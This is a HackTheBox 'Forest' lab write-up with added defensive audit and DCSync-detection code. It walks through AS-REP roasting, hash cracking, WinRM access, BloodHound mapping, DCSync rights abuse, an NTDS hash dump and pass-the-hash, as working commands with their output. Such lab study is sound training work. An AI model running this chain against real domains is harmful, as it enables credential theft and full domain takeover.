0x00 Lab introduction
Forest is a Windows machine on HackTheBox that mainly tests Active Directory (domain) knowledge.
0x01 Port scan
Use nmap to find the open ports
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.161 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
┌──(root💀kali)-[~/hackthebox/Forest]
└─# nmap -sC -sV -p$ports 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 10:42 CST
Nmap scan report for 10.10.10.161
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-09 02:49:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49952/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m52s, deviation: 4h02m32s, median: 6m50s
| smb2-time:
| date: 2022-05-09T02:50:04
|_ start_date: 2022-05-06T12:35:13
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-05-08T19:50:03-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.16 seconds
The open ports (Kerberos, LDAP, SMB and WinRM are all exposed) show this is a domain-joined machine; ports 389, 445 and 5985 are the ones to focus on.
0x02 Obtaining a domain user and password
Enumerate domain users
└─# rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Save these usernames to uname.txt
Use impacket's GetNPUsers to check which of these users have Kerberos pre-authentication disabled and request their AS-REP hashes
└─# impacket-GetNPUsers htb.local/ -usersfile /root/hackthebox/Forest/uname.txt -dc-ip 10.10.10.161
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:c5eed36b25500542d81e06d9d4557562$7f862dd9d40cda641b6c1eb3f1611ef7c0cb8fcbc046f8b27d35757c275b01a551ab133788022007f3374e5b7d7954a4f0e2686668cdb8289e8afd199e0b590014cd5bd6b7e6fa5ed0084f8a3e9967a550d1f18d2a2970428abc98a5d6f06a0b4548abe158a43d12c87f3f4e9bf26cbf65e65ea6759c94b8e1e8e2bcde261bf2f2531ecf828911868c118ed1bf5d56119638a099569e6c888572807010894670af2768b83d809d028abb57a6a7fdee74c324e4f4a4cc894a3c69c5fc759f80bd3aec3d589872b36cdc9faaaa74adaeca114b8a5860f0dc7b8376476f5f53ff0be8801e29fe4a
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
This gives us the AS-REP hash of svc-alfresco. Next crack it with hashcat; looking up the $krb5asrep$23$ format shows the hash type is mode 18200.
hashcat 1.hash /root/dict/rockyou.txt -m 18200
The password of svc-alfresco turns out to be s3rvice. Connect with evil-winrm and grab the first flag.
└─# evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
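As an added defensive counterpart to the GetNPUsers step above (example code, not part of the original writeup), this Python audit decodes userAccountControl the way the KDC does, so that only enabled accounts with pre-authentication disabled are reported; the LDAP filter and the SAMPLE_RECORDS are my own constructions, not values taken from the box.

```python
# Added audit example (not from the writeup): an account is exposed to the
# GetNPUsers step only if userAccountControl has DONT_REQ_PREAUTH set AND the
# account is enabled; disabled accounts answer KDC_ERR_CLIENT_REVOKED instead.
# SAMPLE_RECORDS are constructed, not the box's real attribute values.

# userAccountControl bit flags (subset) as documented by Microsoft.
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

# LDAP bitwise-AND matching rule OID, used to test single UAC bits server-side.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def asrep_roastable_filter() -> str:
    """LDAP filter returning only enabled users with pre-authentication disabled."""
    return (
        "(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH})"
        f"(!(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={ACCOUNTDISABLE})))"
    )


def classify(uac: int) -> str:
    """Map a userAccountControl value to the outcome GetNPUsers would report."""
    if uac & ACCOUNTDISABLE:
        return "disabled"          # KDC_ERR_CLIENT_REVOKED
    if uac & DONT_REQ_PREAUTH:
        return "roastable"         # AS-REP handed out without a password
    return "preauth-required"      # "doesn't have UF_DONT_REQUIRE_PREAUTH set"


def find_roastable(records) -> list:
    """sAMAccountNames an AS-REP request would succeed against, sorted."""
    return sorted(r["sAMAccountName"] for r in records
                  if classify(r["userAccountControl"]) == "roastable")


# Constructed sample records mirroring the three account outcomes seen above.
SAMPLE_RECORDS = [
    {"sAMAccountName": "sebastien", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "SM_2c8eef0a09b545acb",
     "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH},
    {"sAMAccountName": "svc-alfresco",
     "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH},
]

if __name__ == "__main__":
    print(asrep_roastable_filter())
    print("roastable:", find_roastable(SAMPLE_RECORDS))
```

Running the printed filter against a real directory returns exactly the accounts the GetNPUsers step would succeed against, which is the list a defender wants empty.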
0x03 Privilege escalation
Domain information gathering
# Upload the collector
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc-alfresco\Documents\SharpHound.ps1
Data: 1298308 bytes of 1298308 bytes copied
Info: Upload successful!
# Run the script to collect domain information
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/9/2022 12:31 AM 15178 20220509003131_BloodHound.zip
-a---- 5/9/2022 12:31 AM 23725 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/9/2022 12:30 AM 973732 SharpHound.ps1
# Download the result zip
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220509003131_BloodHound.zip
Info: Downloading 20220509003131_BloodHound.zip to ./20220509003131_BloodHound.zip
Info: Download successful!
Load the resulting zip into BloodHound for analysis
# Start neo4j
┌──(root💀kali)-[~/hackthebox/Forest]
└─# neo4j console
# Start BloodHound
┌──(root💀kali)-[~/tools/BloodHound-linux-x64]
└─# ./BloodHound --no-sandbox
(node:15772) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
Find Shortest Paths to Domain Admins
Getting from svc-alfresco's current access to Administrator in the Domain Admins group takes two steps.
1) svc-alfresco is a member of Service Account, which is a member of Privileged IT Account, which in turn is a member of Account Operators; svc-alfresco is therefore effectively a member of Account Operators, and Account Operators has GenericAll over the Exchange Windows Permissions group.
Explanation: the Account Operators group grants its members limited account-creation rights. They can create and modify most types of accounts, including user accounts, local groups and global groups, and they can log on locally to domain controllers. So we can create a new user abc and add it to the "Exchange Windows Permissions" group.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user abc abc123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" abc /add
The command completed successfully.
2) Members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have the right to modify the DACL (discretionary access control list) of the domain HTB.LOCAL. With write access to a target object's DACL you can grant yourself any right you want on that object. Here the abc user is granted DCSync rights, and DCSync is then used to dump the hashes of every user in the domain.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlain -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\abc', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
# Import PowerView.ps1 so that Add-DomainObjectAcl is available
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -PrincipalIdentity abc -Credential $Cred -Rights DCSync
Dumping the domain user hashes
└─# impacket-secretsdump htb.local/abc@10.10.10.161
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daniel:9601:aad3b435b51404eeaad3b435b51404ee:79aa8f83793ca58c378d2b153c42f843:::
dunk:9602:aad3b435b51404eeaad3b435b51404ee:43b407d70f87a40f5884add1cc8316ad:::
abc:9603:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:dc3afd678336c8f5b373400bda3e7032:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
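The DACL change and DRSUAPI dump above leave a trace a defender can alert on: Security event 4662 on the domain object with the replication extended rights, performed by a principal that is not a domain controller. The Python detector below is an added example, not part of the writeup; the GUIDs are Microsoft's documented extended-right identifiers, while SAMPLE_EVENTS are constructed records shaped like 4662 fields, not real logs from the box.

```python
# Added detection example (not from the writeup): replication over DRSUAPI, as
# secretsdump does above, exercises the control-access rights below on the
# domain object, and only domain controllers should ever hold them.

# Extended-right GUIDs that grant directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# The domain object is logged either by class name or by its schema GUID.
DOMAIN_OBJECT_TYPES = {"domaindns", "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"}
CONTROL_ACCESS = 0x100  # access-mask bit that covers extended rights


def replication_rights(event) -> list:
    """Names of replication rights referenced in the event's Properties field."""
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_GUIDS.items() if guid in props]


def detect_dcsync(events, dc_accounts) -> list:
    """Return (account, rights) for non-DC principals replicating the domain."""
    known_dcs = {d.upper() for d in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("ObjectType", "").lower() not in DOMAIN_OBJECT_TYPES:
            continue
        if not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
            continue
        rights = replication_rights(ev)
        subject = ev.get("SubjectUserName", "")
        if rights and subject.upper() not in known_dcs:
            alerts.append((subject, rights))
    return alerts


# Constructed samples: the DC replicating normally, then abc doing the same.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectType": "domainDNS",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "abc",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS, ["FOREST$"]):
        print(f"ALERT possible DCSync by {account}: {', '.join(rights)}")
```

Auditing for "Directory Service Access" must be enabled on the DC for 4662 to be written at all; pair this with alerting on 5136 (directory object modified) to catch the Add-DomainObjectAcl step itself.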
Pass-the-hash attack
Use wmiexec for PTH
└─# impacket-wmiexec htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
C:\>type C:\Users\administrator\Desktop\root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
This gives us the root flag.
0x04 Problems encountered
1. For domain information gathering, SharpHound.ps1 is recommended; it collects more complete information than bloodhound-python.
2. BloodHound version 4.0.3 can parse the collected domain information JSON files; version 4.1.0 failed to parse them.
3. Remember that the password in $SecPassword must match the password of the newly created user.